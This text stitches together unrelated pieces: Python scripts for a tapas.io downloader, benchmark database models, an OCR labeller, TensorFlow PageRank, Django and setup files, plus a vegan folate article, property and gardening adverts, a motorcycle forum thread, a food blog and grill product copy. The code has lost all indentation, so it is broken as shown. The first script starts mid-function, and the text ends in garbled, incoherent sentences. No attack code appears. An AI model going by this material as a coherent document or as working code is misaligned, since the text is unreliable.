data.append({'id': int(episode.attrib['data-permalink'][episode.attrib['data-permalink'].rfind('/') + 1:])})
printLine('{} [{}] ({} pages):'.format(name, urlName, len(data)))
# Check if folder exsists, if not create it
printLine('Checking folder...', True)
# If the user specified a base output directory, prepend that on our folder
savePath = check_path('{} [{}]'.format(name, urlName), fat=args.restrict_characters)
if (basePath != ""):
savePath = os.path.join(basePath, savePath)
printLine('Full path is: ' + str(savePath))
if os.path.isdir(savePath) and not args.force:
printLine('Found directory, only updating (use -f/--force to disable)')
filesInDir = list(os.scandir(savePath))
fileNames = []
for fileInDir in filesInDir:
fileNames.append(fileInDir.name)
fileNames.sort()
imgOffset = len(fileNames)
if imgOffset > 1:
lastFile = fileNames[-1]
lastPageId = int(lastFile[lastFile.rindex('#') + 1:lastFile.rindex('.')])
pageOffset = next(i for i, page in enumerate(data) if page['id'] == lastPageId) + 1
data = data[pageOffset:]
else:
pageOffset = 0
else:
if not os.path.isdir(savePath):
os.mkdir(savePath)
printLine('Creating folder...', True)
pageOffset = 0
imgOffset = 0
# Download header
if True not in [file.name.startswith('-1 - header.') for file in os.scandir(savePath)]:
printLine('Downloading header...', True)
if headerSrc is not None:
with open(os.path.join(savePath, '-1 - header.{}'.format(headerSrc[headerSrc.rindex('.') + 1:])), 'wb') as f:
f.write(requests.get(headerSrc).content)
printLine('Downloaded header')
else:
printLine('Header not found')
if len(data) <= 0:
print('Nothing todo: No pages found or all already downloaded\n')
continue
# Check if series is comic or novel
if len(pq(f'https://tapas.io/episode/{data[0]["id"]}', headers={'user-agent': 'tapas-dl'})('.content__img.js-lazy')) > 0:
printLine('Detected comic')
# Get images from page from JS api
allImgCount = 0
for pageCount, pageData in enumerate(data):
# Test whether the page we have in mind is reachable
pageReqest = requests.get(f'https://tapas.io/episode/{pageData["id"]}', headers={'user-agent': 'tapas-dl'})
if pageReqest.status_code != 200:
# This page was unavailable. Let the user know and add a single dummy image entry.
# (We will check for this when we go to download images.)
printLine('Error: "{}" page {}/{} not found. Page Request yielded: {} (Early Access page?)'.format(urlName, pageCount + pageOffset, len(data) + pageOffset, str(pageReqest.status_code)), True)
pageData['title'] = "PageUnavailable"
pageData['imgs'] = []
pageData['imgs'].append("PageUnavailable")
else:
# If the page did not yield an access error, go ahead an scrape for image entries.
pageHtml = pq(f'https://tapas.io/episode/{pageData["id"]}', headers={'user-agent': 'tapas-dl'})
printLine('Downloaded image data from {} images (pages {}/{})...'.format(allImgCount, pageCount + pageOffset, len(data) + pageOffset), True)
pageData['title'] = pageHtml('.info__title').text()
pageData['imgs'] = []
for img in pageHtml('.content__img'):
pageData['imgs'].append(pq(img).attr('data-src'))
allImgCount += 1
# Download images
imgCount = 0
for pageCount, pageData in enumerate(data):
for imgOfPageCount, img in enumerate(pageData['imgs']):
# Check if the first image entry is the fummy text that indicates the page was unavailable when we tried to scrape it.
if pageData['imgs'][0] != "PageUnavailable":
# If the entry isn't a dummy entry, go ahead and download the images it contains.
with open(os.path.join(savePath, check_path('{} - {} - {} - {} - #{}.{}'.format(lead0(imgCount + imgOffset, allImgCount + imgOffset), lead0(pageCount + pageOffset, len(pageData) + pageOffset),
lead0(imgOfPageCount, len(pageData['imgs'])), pageData['title'], pageData['id'], img[img.rindex('.') + 1:]),
fat=args.restrict_characters)), 'wb') as f:
f.write(requests.get(img).content)
imgCount += 1
printLine('Downloaded image {}/{} from page {}/{} ({}/{} images)...'.format(imgOfPageCount + 1, len(pageData['imgs']), pageCount + pageOffset, len(data) + pageOffset, imgCount + imgOffset, allImgCount + imgOffset), True)
else:
# If the entry was a dummy entry, skip it and let the user know.
printLine('Error: No images downloaded from page {}/{}.'.format(pageCount + pageOffset, len(data) + pageOffset), True)
if data != []:
printLine('Downloaded {} of {} images'.format(imgCount, allImgCount))
else:
printLine('Nothing to do')
if urlCount + 1 != len(args.url):
printLine()
else:
printLine('Detected novel')
from ebooklib import epub
# download/create epub
book = epub.EpubBook()
customCss = None
# Add meta data
book.set_identifier(urlName)
book.set_title(name)
book.set_language('en')
book.add_author(author)
header_name = os.path.join(savePath, list(filter(re.compile(r'.+header\..+').match, os.listdir(savePath)))[0])
book.set_cover("cover.jpg", open(header_name, 'rb').read())
book.toc = []
book.spine = ['cover']
# create about page
chapter = epub.EpubHtml(title='about', file_name='about.xhtml')
chapter.content = f'<h1>About</h1><p>Title: {name}</p><p>Author: {book.metadata["http://purl.org/dc/elements/1.1/"]["creator"][0][0]}</p><p>Source: <a href="{"https://tapas.io/series/" + urlName}">{"https://tapas.io/series/" + urlName}</a></p>'
book.add_item(chapter)
book.spine.append(chapter)
# Append nav page
book.spine.append('nav')
# create chapters
for pageCount, pageData in enumerate(data):
printLine('Downloaded page {}/{}...'.format(pageCount + 1, len(data)), True)
pagePq = pq(url='https://tapas.io/episode/' + str(pageData['id']), headers={'user-agent': 'tapas-dl'})
pageTitle = pagePq('.viewer__header > .title').text()
pageHtml = f'<h1>{pageTitle}</h1>'
for p in pagePq('article.viewer__body > div.ep-epub-content > div.body > p'):
p = pq(p)
if p.text() is not None:
pageHtml += '<p>' + p.text() + '</p>'
chapter = epub.EpubHtml(title=pageTitle, file_name=str(pageData['id']) + '.xhtml')
chapter.content = pageHtml
book.add_item(chapter)
# define Table Of Contents
book.toc.append(epub.Link(str(pageData['id']) + '.xhtml', pageTitle, str(pageData['id'])))
# basic spine
book.spine.append(chapter)
# add default NCX and Nav file
book.add_item(epub.EpubNcx())
book.add_item(epub.EpubNav())
# add CSS
style = ''
nav_css = epub.EpubItem(uid="style_nav", file_name="style/nav.css", media_type="text/css", content=style)
book.add_item(nav_css)
# write to the file
epub.write_epub(os.path.join('/'.join(savePath.split('/')[:-1]), check_path(f'{name}.epub', fat=args.restrict_characters)), book)
# remove tmp folder
for file in os.listdir(savePath):
os.remove(os.path.join(savePath, file))
os.removedirs(savePath)
|
This World Health Day, Vegan Society Dietitian Heather Russell collaborates with charity Shine to explain what vegans need to know about this B vitamin.
Folate and folic acid are both forms of vitamin B9. Folate is the type that occurs naturally in foods and in the body, whereas folic acid is the version found fortified foods and supplements.
Data from the EPIC-Oxford study, which compares different dietary groups, showed that vegan participants had the highest levels of folate in their blood. However, being vegan is no guarantee that you’re getting enough folate! Make sure that your diet is rich in this nutrient by including good sources daily, such as leafy greens, beans, peas and lentils. Oranges, beetroot, quinoa, mango, asparagus, avocado, okra, parsnips, chia seeds and ground linseed (flaxseed) also contain useful amounts of folate.
The Vegan Society’s recommendations about vitamin B12 are designed to keep down the level of homocysteine in the bloodstream as well as ensuring that vitamin B12 deficiency symptoms are avoided. Elevated homocysteine has been linked to higher risks of heart and blood vessel disease and pregnancy complications. Research suggests that elevated homocysteine is a significant issue within the vegan community.
Homocysteine levels are affected by other nutrients, most notably folate/folic acid. Our VEG 1 supplement contains extra B vitamins, including folic acid, which ensure that the vitamin B12 can do its job.
It’s a good idea for women of childbearing age to use a folic acid supplement of 400 micrograms as nearly half of all pregnancies are unplanned and folic acid greatly reduces the risk of a baby developing birth defects like spina bifida. The oral contraceptive pill depletes folate levels in the body, increasing the need to take a precautionary folic acid supplement. Without supplementation, expectant mothers are also at risk of anaemia due to the increased folate needs of the developing baby. For maximum protection, folic acid should be taken eight weeks prior to conception and during the first trimester. According to Shine, only 31% of women take the right dose at the right time, with many more not starting until they’re already pregnant, when it’s too late.
It is safe to take 400 micrograms of folic acid in addition to the 200 micrograms found in VEG 1?
Is there such a thing as too much folate/folic acid?
There’s no upper limit for our intakes of folate found in foods like leafy greens, beans, peas and lentils. For adults, there is a daily upper limit of 1000 micrograms for the amount of folic acid obtained from fortified foods and supplementation. This also applies during pregnancy unless you’re receiving medical advice about high dose supplementation. High dose supplementation may be needed for those with a family history of birth defects or who have a high body mass index, have diabetes or take anti-epilepsy medication.
It’s good to be aware that the government is considering mandatory fortification of flour with folic acid, which has the potential to improve the folic acid status and health of our nation, including a reduction in the number of pregnancies affected by neural tube defects. This nutritional strategy is supported by Shine and our partner the British Dietetic Association. |
"""
Benchmark models.
"""
import json
import os
import psycopg2
from collections import Iterable
from sqlalchemy import create_engine, MetaData, Table, Column, Integer, String
from sqlalchemy.orm import sessionmaker
from sqlalchemy.pool import QueuePool
from sqlalchemy.ext.declarative import declarative_base, DeclarativeMeta
def get_conn():
return psycopg2.connect(
user='benchmarkdbuser',
password='benchmarkdbpass',
host='tfb-database',
port='5432',
database='hello_world')
conn_pool = QueuePool(get_conn, pool_size=100, max_overflow=25, echo=False)
pg = create_engine('postgresql://', pool=conn_pool)
DBSession = sessionmaker(bind=pg)()
metadata = MetaData()
DatabaseBase = declarative_base()
class World(DatabaseBase):
__tablename__ = 'world'
id = Column('id', Integer, primary_key=True)
randomNumber = Column(
'randomnumber', Integer, nullable=False, server_default='0')
def __json__(self, request=None):
return {'id': self.id, 'randomNumber': self.randomNumber}
class Fortune(DatabaseBase):
__tablename__ = 'fortune'
id = Column('id', Integer, primary_key=True)
message = Column('message', String, nullable=False)
def __json__(self):
return {'id': self.id, 'message': self.message}
|
Today, we’re going to discuss value at the higher end of the market. Throughout Connecticut, we’re experiencing the same thing, especially on the local levels where homes priced in the upper echelon are at tremendous value.
For example, we have a listing on 15 Taunton Lane in Newtown, Connecticut that is priced just under $1 million. Eight years ago, the property sold for $1.3 million. The original builder bought it back, and has reconditioned the entire property before putting it on the market.
We’re seeing this kind of value across the market. We are not depreciating. If you’re looking to get into a beautiful, larger home, now might be your time. |
# coding: u8
from hashlib import md5 as _m5
from itertools import izip
import cPickle as pickle
import os
import time
from PIL import Image
import Levenshtein
md5 = lambda s: _m5(s).hexdigest()
class Otsu(object):
FAST_VAL = 255 # 只要是非0就可以
BINARY_THRESHOLD = 190 # 二值化阈值
def __init__(self, path=None, im=None):
if im is None:
self.open_image(path)
else:
self.im = im
self.w, self.h = self.im.size
def get_vertical_projection(self, fast=True, rotate=False):
u'''得到二值图像的垂直投影图。
返回包含投影数据的列表,列表中的数字表示某列所有像素值为0的个数。
如果fast为True,那么当某列已经有字符,就不再继续查找此列了。
注意:此时返回的graph中的值为0或FAST_VAL,并不是总个数。
'''
im = self.im.transpose(Image.ROTATE_90) if rotate else self.im
pixels = im.load()
w, h = im.size
graph = [0] * w
for x in range(w):
for y in range(h):
pixel = pixels[x, y]
if pixel == 0: # 此列有字符
if fast: # 跳过此列
graph[x] = self.FAST_VAL
break
else:
graph[x] += 1
return graph
def show_vertical_projection(self, graph):
w = len(graph)
h = max(graph)
img = Image.new('1', (w, h))
for x in range(w):
for y in range(h):
if y <= graph[x]:
img.putpixel((x, y), 255)
else:
break
# 图是从左上角画的,为了方便查看,将其头尾旋转
img.transpose(Image.FLIP_TOP_BOTTOM).show()
return self
def open_image(self, path):
im = Image.open(path)
self.im = im.convert('L') # 灰度
self.im = self.im.point(
lambda p: p > self.BINARY_THRESHOLD and 255) # 二值
return self
def cut_to_lines(self, rotate=True, show=False):
u"""将二值图片按行切割。
原理:按照图片旋转90度后的垂直投影图切割。
"""
graph = self.get_vertical_projection(fast=True, rotate=rotate)
if show:
self.show_vertical_projection(graph)
if len(list(set(graph))) == 1: # 数字全为0,表示没有任何文字
return
starts = [] # 保存所有FAST_VAL元素在每行中第一次出现的index
ends = [] # 保存所有FAST_VAL元素在每行中最后一次出现的index
# 若graph = [0, 0, 255, 255, 255, 0, 0, 0, 255, 255, 0, 255, 0, 0]
# | | | | / \
# 则starts == [ 2, 4, 8, 9, 11, 11]
char = self.FAST_VAL # 找FAST_VAL
for i, v in enumerate(graph):
if v == char:
# 交换查找项
if char == self.FAST_VAL: # 找到当前行的第一个FAST_VAL
char = 0
starts.append(i)
else: # 找到当前行的最后一个FAST_VAL
char = self.FAST_VAL
ends.append(i - 1) # i为0的位置,i-1则为FAST_VAL的位置
if 0 and not rotate:
# 修正被分割的左右结构
# 左右结构之间的间隙比较小,这里取间隙小于Npx时认为是左右结构
N = 2
new_starts = []
new_ends = []
last_s = last_e = 0
def push(start, end):
new_starts.append(start)
new_ends.append(end)
for start, end in izip(starts, ends):
if last_s == 0:
push(start, end)
elif start - last_e < N:
new_ends[-1] = end
else:
push(start, end)
last_s, last_e = start, end
starts, ends = new_starts, new_ends
i = 1
for start, end in izip(starts, ends):
# graph中数据是旋转90度的结果,故保存的数据对原图像来说是y轴
if rotate:
box = (0, start, self.w, end)
else:
box = (start, 0, end, self.h)
yield self.im.crop(box), i
i += 1
if __name__ == '__main__':
import glob
glob.glob('./imgs/*.jpg')
otsu = Otsu('/home/finn/rubbish/ocr/test-10001.bmp')
#otsu.im.show()
i = 1000
def update(m5, char):
a = samples[m5]
a[-1] = char
samples[m5] = a
pickle_file = 'data.pickle'
samples = pickle.load(open(pickle_file, 'rb'))
bak_pickle_file = '%s._%d_%s' % (pickle_file, time.time(), '.bak')
open(bak_pickle_file, 'wb').write(open(pickle_file, 'rb').read())
"""
for fn in glob.glob('./cls/*.png'):
m5, char = fn.split('.')[1].split('/')[-1].split('_')
samples[m5] = [char, char, char]
"""
update('0538fd2620d99c82ea1627987d7c4e96', '偕-l')
for line, line_num in otsu.cut_to_lines():
#line.show()
line.save('/tmp/cut/0000000_cur_line.png')
otsu = Otsu(im=line)
for word, col_num in otsu.cut_to_lines(rotate=False, show=0):
_word = word
word = word.resize((48, 48), Image.BICUBIC).convert('1')
data = ''.join(str(p) for p in word.getdata()).replace('255', '1')
m5 = md5(data)
if m5 not in samples:
# 请开着目录/tmp/cut方便输入
path = '/tmp/cut/%s.%s_%s.png' % (line_num, col_num, m5)
word.save(path)
min_distance = len(data)
maybe = None
for key, value in samples.items():
binary_string = value[-2]
try:
distance = Levenshtein.hamming(binary_string, data)
except:
del samples[key]
if min_distance > distance:
maybe = value
min_distance = distance
maychar = maybe[-1]
print 'maybe:', maychar, min_distance
char = raw_input('input(press RETURN to accept %s):' % maychar)
if char == '':
char = maychar
os.remove(path)
os.system('clear')
samples[m5] = [word.tostring(), data, char]
pickle.dump(samples, open(pickle_file, 'wb'))
path = 'cls/%s_%s.png' % (m5, char)
_word.save(path)
else:
char = samples[m5][-1]
#samples[m5] = [word.tostring(), data, char]
print m5, char
path = 'cut/%s.%s_%s_%s.png' % (line_num, col_num, m5, char)
_word.save(path)
i += 1
|
Are you in need of great value Garden Hedge in Kings Cross Central London London N1C?
Looking for an efficient yet affordable Garden Hedge service for your outdoor area in St. Pancras Station, London, N1C?
Choose our Garden Hedge company in Kings Cross Central London London N1C and we will do all your gardening chores with ease. Our gardeners will provide you with a cost-effective Garden Hedge service of outstanding quality.
From one-off landscaping services to regular lawn mowing in Kings Cross Central London London N1C, we can offer you a wide variety of services. Contact our knowledgeable team over the phone or via email and we will give you a free no-obligation quote. It is easy to book our efficient Kings Cross Central London London N1C gardening services online – all you need to do is complete the form on our contact page. After you share your gardening requirements with our team and agree on the price for your job, our Garden Hedge gardeners will show up at your address in Kings Cross Central London London N1C to finish the task. |
#!/usr/bin/env python
# Copyright (c) 2016 Matt Struble. All Rights Reserved.
#
# Use is subject to license terms.
#
# Author: Matt Struble
# Date: Aug. 31 2016
import time, os
from graphics.graphicsdevice import GraphicsDevice
from inputs import Keyboard, Keys
class Game: #{
""" Handles initialization and core game loop. """
FPS = 30.0
SEC_PER_FRAME = 1.0/FPS
def __init__(self, w='1000', h='300', title='Game'):
self.gd = GraphicsDevice(w, h, title)
self.run()
def run(self):
self._initialize()
self._loadContent()
self._loop()
def _initialize(self):
Keyboard.initialize()
self.running = True
def _terminate(self):
Keyboard.terminate()
self.running = False
def _loadContent(self):
pass
def _loop(self):
previous = time.time()
while self.running:
current = time.time()
dt = current - previous
previous = current
self._processInput()
self._update(dt)
self._render()
sleepTime = self.SEC_PER_FRAME - ( time.time() - current )
if sleepTime > 0:
time.sleep( sleepTime )
def _processInput(self):
if Keyboard.released(Keys.ESCAPE):
self._terminate()
def _update(self, dt):
Keyboard._update()
def _render(self):
# Clear terminal buffer
#os.system('cls' if os.name == 'nt' else 'clear')
print Keyboard.getKeyboardString()
|
My local dealer just quoted me $100 for a shop manual and said they'd have to special order it.
Thanks a million for putting the link to the free PDF in the knowledge stickies.
If I can find a DIY brain cell somewhere, this forum is going to save me a fortune!
Welcome aboard! You're off to a good start. The knowledge base here is nothing short of great. Lots of gearheads, motorheads, professional engineers, mechanics, designers, racers hang out here. It's a great motorcycle and these folks are dedicated to making it the best that it can be.
I came aboard about 2 months ago....yes this forum is awesome.
It saved me a ton of money- so I try to post stuff I find deals on- to try to give back somewhat.
^ And goodby from the forum!
Dude... Don't be a douche. you're better than that.
Dude... Don't be a douche.
1. Absolutely no personal attacks. Personal attacks do not help make a point; they only hurt the community and deter users from helping to create a good forum. Derogatory comments about another member may be removed by any moderator. Repeated or severe personal attacks may lead to a temporary or permanent ban.
Last edited by Wolverine; 02-12-2012 at 11:05 AM.
I have found most of your posts to be helpful and informative.
Perhaps you shoud read those forum rules yourself and put them into action.
Oh for Chrissakes! Would you guys just ******* give it up already?! I'm getting a little bit annoyed at the childish comments people have been making lately. Grow up...Please.
ha ha......give em hell boss!
Said this before but....... lets just play nice guys. We r all here for the same specific reason to split the wind and enjoy our wonderful beasts of burdon. "Cant we all just get along"
Quick Reply: Thank you, thank you! $100 saved! |
from django.conf import settings
from django.db import models
import os
class Tfile(models.Model):
PERM_PUBLIC = 1
PERM_CONFIDENTIAL = 2
PERM_CLASSIFIED = 3
PERM_TYPES = (
(PERM_PUBLIC, 'Public'),
(PERM_CONFIDENTIAL, 'Confidential'),
(PERM_CLASSIFIED, 'Classified'),
)
LIMIT_NONE = 'N'
LIMIT_TIME = 'T'
LIMIT_ACCESS = 'A'
LIMIT_TYPES = (
(LIMIT_NONE, 'None'),
(LIMIT_TIME, 'Time'),
(LIMIT_ACCESS, 'Access'),
)
uid = models.CharField(primary_key=True, max_length=32)
name = models.CharField(max_length=255)
size = models.BigIntegerField()
perm = models.PositiveSmallIntegerField(choices=PERM_TYPES)
qid = models.CharField(max_length=6, null=True, blank=True)
access_count = models.IntegerField(default=0)
limit = models.CharField(max_length=1, choices=LIMIT_TYPES)
time_limit = models.DateTimeField(null=True, blank=True)
access_limit = models.IntegerField(default=0)
upload_time = models.DateTimeField(auto_now_add=True)
last_access_time = models.DateTimeField(auto_now=True)
def __str__(self):
return '{self.name}'.format(self=self)
def abs_path(self):
return os.path.join(settings.TRASH_PATH, self.uid)
class Meta:
verbose_name_plural = "tfiles"
class Penalty(models.Model):
ip = models.GenericIPAddressField(unique=True)
amount = models.IntegerField()
last_time = models.DateTimeField(auto_now=True)
def __str__(self):
return '{self.ip}: {self.amount}'.format(self=self)
class Meta:
verbose_name_plural = "penalties"
|
An opportunity to visit the heart of the downstream industry in Bahrain. Gain an overview on the refining and petrochemical processes and see the various plant equipment such as reactors, columns, heat exchangers and much more.
Secure your seat with online registration.
Answer a set of questions by interacting with exhibitors and delegates and get bonus points for attending technical sessions. Submit your answers at the end of the day to win valuable prizes. Register at the YouChemE Information Desk.
Get your professional headshot taken for free.
An interactive workshop by Roddy Herbert from Koru International on the neuroscience of controlling messages sent from your heart to your brain and vice versa using the Heart Rate Variability technique.
Panel Discussion - How did you make it?
An open discussion on career success and climbing the ladder. |
from __future__ import print_function
import os
import platform
import sys
from setuptools import find_packages, setup
import connor
_REQUIRED_PYTHON_VERSION = (2, 7)
def check_python_version():
if sys.version_info < _REQUIRED_PYTHON_VERSION:
msg_format = '''
Problem: Python v{0}.{1} or above is required but you are using v{2}.
Please install a supported version of Python and try again.\
'''
message = msg_format.format(_REQUIRED_PYTHON_VERSION[0],
_REQUIRED_PYTHON_VERSION[1],
platform.python_version())
print(message, file=sys.stderr)
sys.exit(1)
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as filename:
return filename.read()
check_python_version()
setup(name='Connor',
version = connor.__version__,
description=('Command-line tool to deduplicate reads in bam files based '
'on custom inline barcoding.'),
long_description=(read('README.rst') + '\n\n' +
read('doc/CHANGELOG.rst') + '\n\n' +
read('doc/AUTHORS.rst')),
url='https://github.com/umich-brcf-bioinf/Connor',
author='University of Michigan Bioinformatics Core',
author_email='bfx-connor@umich.edu',
license='Apache',
packages=find_packages(exclude=['test*']),
classifiers=['Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Operating System :: Unix',
'Operating System :: MacOS',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Bio-Informatics'],
keywords='bioinformatic exome-seq DNA-seq BAM',
setup_requires=['cython'],
install_requires=['pysam>=0.8.4', 'sortedcontainers>=1.5.3'],
entry_points={'console_scripts': ['connor=connor.connor:main']},
test_suite='nose.collector',
tests_require=['nose', 'pysam', 'testfixtures'],
zip_safe=False)
|
A gruesome story from ten years ago…the faint-hearted might like to look away now.
I was opening a tin of corned beef, the sort with a key. I’d turned the key all around the can and was trying to pull the smaller section away – when it suddenly gave way.
Ouch! I said, thinking I’d given myself a little nick.
Then the blood started fountaining out of the end of my finger.
The Goblin Meat Pudding sounds like something Gollum would buy down at Crazy Saruman’s Convenience & Liquor Store. But behind the silly name lurks a meal fit for a king.
For the last two weeks every weekday lunchtime I’ve sat down to a couple of Goblin Meat Puddings, made by Simpsons Foods of Manchester. I’ve been eating these things since I was a kid and the gorgeous L recently ordered 20 (yes 20) of them in an online grocery order because she knows I like them.
This lunchtime I have eaten the last of them. So it’s goodbye to the tasty soft pastry for a while and I’ll have to eat something more healthy instead. But I just wanted to pay tribute to one of the finest foods available, and easy to cook too, taking just 90 seconds in the microwave.
I’ve not eaten one of these things for ages until L bought me some and the can has certainly changed and is more attractive. The problem with the old one was that it was a bit of a lottery whether you opened it at the right end. So you’d end up having to open up both and pushing the pudding out. Now with it’s handy grenade style packaging, pudding opening confusion is a thing of the past.
But all waffling and silliness aside, the Goblin Meat Pudding really is the lunch of champions, albeit slightly porkie champions.
I hated going to church as a kid. Not unusual that. Not only did I find it boring, I just didn’t believe – and realised this was odd for a pretty young kid going through the usual rites of passage such as first confession, communion and confirmation.
I think this lack of faith grew into a pretty militant and active atheism (as opposed to just not caring) precisely because every Sunday I would have to go to church with the family and at numerous times around Easter. I was bemused at Easter by Benediction, wondering if there was some correlation between the length of the service, the number of times we’d have to kneel and then stand up; and the number of alter-boys who fainted. |
import numpy as np
import tensorflow as tf
from tfgraph.algorithms.pagerank.transition.transition import Transition
from tfgraph.graph.graph import Graph
class TransitionResetMatrix(Transition):
""" Transition Matrix Class
This class implements the functionality of a 2-D matrix that represents the
probability distribution of walk between the vertices of the graph.
Attributes:
sess (:obj:`tf.Session`): This attribute represents the session that runs
the TensorFlow operations.
name (str): This attribute represents the name of the object in TensorFlow's
op Graph.
writer (:obj:`tf.summary.FileWriter`): This attribute represents a
TensorFlow's Writer, that is used to obtain stats.
is_sparse (bool): Use sparse Tensors if it's set to True. Not
implemented yet. Show the Todo.
G (:obj:`tfgraph.Graph`): The graph on which the transition is referred.
transition (:obj:`tf.Variable`): The 2-D `tf.Tensor` with the same shape as
adjacency matrix of the graph, that represents the probabilities to
move from one vertex to another.
beta (float): The reset probability of the random walks, i.e. the
probability that a user that surfs the graph an decides to jump to another
vertex not connected to the current.
"""
def __init__(self, sess: tf.Session, name: str, graph: Graph,
beta: float,
writer: tf.summary.FileWriter = None,
is_sparse: bool = False) -> None:
""" Constructor of the class.
This method is called to create a new instance of Transition class.
Args:
sess (:obj:`tf.Session`): This attribute represents the session that runs
the TensorFlow operations.
name (str): This attribute represents the name of the object in
TensorFlow's op Graph.
graph (:obj:`tfgraph.Graph`): The graph on which the transition is referred.
beta (float): The reset probability of the random walks, i.e. the
probability that a user that surfs the graph an decides to jump to
another vertex not connected to the current.
writer (:obj:`tf.summary.FileWriter`): This attribute represents a
TensorFlow's Writer, that is used to obtain stats.
is_sparse (bool): Use sparse Tensors if it's set to True. Not implemented
yet. Show the Todo.
"""
Transition.__init__(self, sess=sess, name=name, graph=graph, writer=writer,
is_sparse=is_sparse)
self.beta = beta
self.transition = tf.Variable(tf.add(
tf.scalar_mul(beta, tf.div(self.G.A_tf,
self.G.out_degrees_tf)),
(1 - beta) / self.G.n_tf),
name=self.name)
self.run_tf(tf.variables_initializer([self.transition]))
def get_tf(self, *args, **kwargs):
""" The method that returns the transition Tensor.
This method will return the transition matrix of the graph.
Args:
*args: The args of the `get_tf()` method.
**kwargs: The kwargs of the `get_tf()` method.
Returns:
(:obj:`tf.Tensor`): A `tf.Tensor` that contains the distribution of
transitions over vertices of the graph.
"""
return self.transition
def update_edge(self, edge: np.ndarray, change: float) -> None:
""" The callback to receive notifications about edge changes in the graph.
This method is called from the Graph when an addition or deletion is
produced on the edge set. So probably is necessary to recompute the
transition matrix.
Args:
edge (:obj:`np.ndarray`): A 1-D `np.ndarray` that represents the edge that
changes in the graph, where `edge[0]` is the source vertex, and
`edge[1]` the destination vertex.
change (float): The variation of the edge weight. If the final value is
0.0 then the edge is removed.
Returns:
This method returns nothing.
"""
if change > 0.0:
self.run_tf(tf.scatter_nd_update(
self.transition, [[edge[0]]],
tf.add(
tf.scalar_mul(
self.beta,
tf.div(
self.G.A_tf_vertex(edge[0]),
self.G.out_degrees_tf_vertex(edge[0]))),
(1 - self.beta) / self.G.n_tf)))
else:
self.run_tf(tf.scatter_nd_update(
self.transition, [[edge[0]]],
tf.where(self.G.is_not_sink_tf_vertex(edge[0]),
tf.add(
tf.scalar_mul(
self.beta,
tf.div(
self.G.A_tf_vertex(edge[0]),
self.G.out_degrees_tf_vertex(edge[0]))),
(
1 - self.beta) / self.G.n_tf),
tf.fill([1, self.G.n], tf.pow(self.G.n_tf, -1)))))
self._notify(edge, change)
|
Hestan Outdoor grills combine the ultimate in precision performance & innovative design to meet the needs of every griller, from the novice to the experienced grill master. The Hestan Outdoor grill series is made in the USA with heavy-gauge welded-body construction, commercial grade end caps, Zamak die cast knobs, burner indicators & bezels and accented throughout by Hestan Marquise panels and handles. The Hestan 36-Inch Freestanding Natural Gas Grill On Tower Cart features two heavy duty 321 grade stainless steel Trellis tubular style burners that provide up to 25,000 BTUs each and one high-performance variable ceramic infrared sear burner that provides up to 25,000 BTUs for a total of 75,000 BTUs of high performance cooking power. The hybrid burner configuration offers maximum cooking options. The ceramic infrared sear burner allows you to sear thick cuts of meat, sealing in precious juices. Grilling surface temperatures are evenly distributed by a radiant ceramic briquette tray system. The 14,000 BTU multipurpose ceramic infrared top burner with salamander placement makes is perfect for rotisserie, broiling or finishing and includes a concealed whisper-quiet chain-driven rotisserie motor system rated for up to 50-pounds, as well as a porcelain broiling pan, rotisserie spit and forks. The laser DiamondCut 5/16-inch stainless steel cooking grates and warming rack provide 653 sq. in. primary and 236 sq. in. secondary cooking area for a total of 889 square inches of evenly-heated grilling surface. The warming rack features three vertical positions, allowing it to be used as additional cooking area or concealed storage when not in use. This grill comes packed with many convenient features that add to your grilling experience, including the easy-open, spring-assist Horizon hood, designed to stay open at any desired height. Motion-activated Stadium halogen under-hood lighting illuminates the grilling area while the LED control panel lighting keeps your controls visible for nighttime grilling and entertaining. The symmetrical flip-to-clean radiant tray and stainless steel removable drip tray make cleanup simple, and a one-push automatic ignition system makes lighting your grill a breeze. The Hestan Double Door Tower Cart offers an abundance of storage and working space with two folding side shelves and two soft-close access doors with recessed Marquise-accented panels & commercial grade handles. The cart interior features a pullout propane tank tray that can easily be converted for trash & recycling bin storage. Commercial-grade casters allow for smooth cart movement and 360-degree maneuverability. This grill features durable, powder coated stainless steel panels in the Hestan signature Tin Roof color finish. |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# FILE: userObj.py
#
# An object that mirrors the user data table in the database
#
# Copyright by Author. All rights reserved. Not for reuse without
# express permissions.
#
#
from datetime import datetime
import copy
class userObj(object):
def __init__(self):
self.rid = None
self.user_name = ""
self.screen_name = ""
self.user_id = 0
self.join_dt = datetime(2000,1,1,0,0,0,0)
self.verified = False
self.geo_enabled = False
self.location = ""
self.lang = ""
self.time_zone = ""
self.url = ""
self.description = ""
def to_dict(self):
rec = {}
if( self.rid > 0 ):
rec['rid'] = self.rid
rec['user_name'] = self.user_name
rec['screen_name'] = self.screen_name
rec['user_id'] = self.user_id
rec['join_dt'] = self.join_dt
rec['verified'] = self.verified
rec['geo_enabled'] = self.geo_enabled
rec['location'] = self.location
rec['lang'] = self.lang
rec['time_zone'] = self.time_zone
rec['url'] = self.url
rec['description'] = self.description
return rec
def from_dict(self, rec):
nobj = userObj()
if( rec ):
nobj.user_name = rec['user_name']
nobj.screen_name = rec['screen_name']
nobj.user_id = rec['user_id']
nobj.join_dt = rec['join_dt']
nobj.verified = rec['verified']
nobj.geo_enabled = rec['geo_enabled']
nobj.location = rec['location']
nobj.lang = rec['lang']
nobj.time_zone = rec['time_zone']
nobj.url = rec['url']
nobj.description = rec['description']
return nobj
def clone(self):
nobj = userObj()
if( self.rid > 0 ):
nobj.rid = self.rid
nobj.user_name = self.user_name
nobj.screen_name = self.screen_name
nobj.user_id = self.user_id
nobj.join_dt = self.join_dt
nobj.verified = self.verified
nobj.geo_enabled = self.geo_enabled
nobj.location = self.location
nobj.lang = self.lang
nobj.time_zone = self.time_zone
nobj.url = self.url
nobj.description = self.description
return nobj
def __repr__(self):
return "<userObj('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')>"%(str(self.rid),str(self.user_name),str(self.screen_name),str(self.user_id),str(self.join_dt),str(self.verified),str(self.geo_enabled),str(self.location),str(self.lang),str(self.time_zone),str(self.url),str(self.description))
|
Sects which are at best shadows of Churches wax and wane with the priestly powers they subconsciously or. Steam and.
Removes his cap when visiting the mess decks as token of respect.
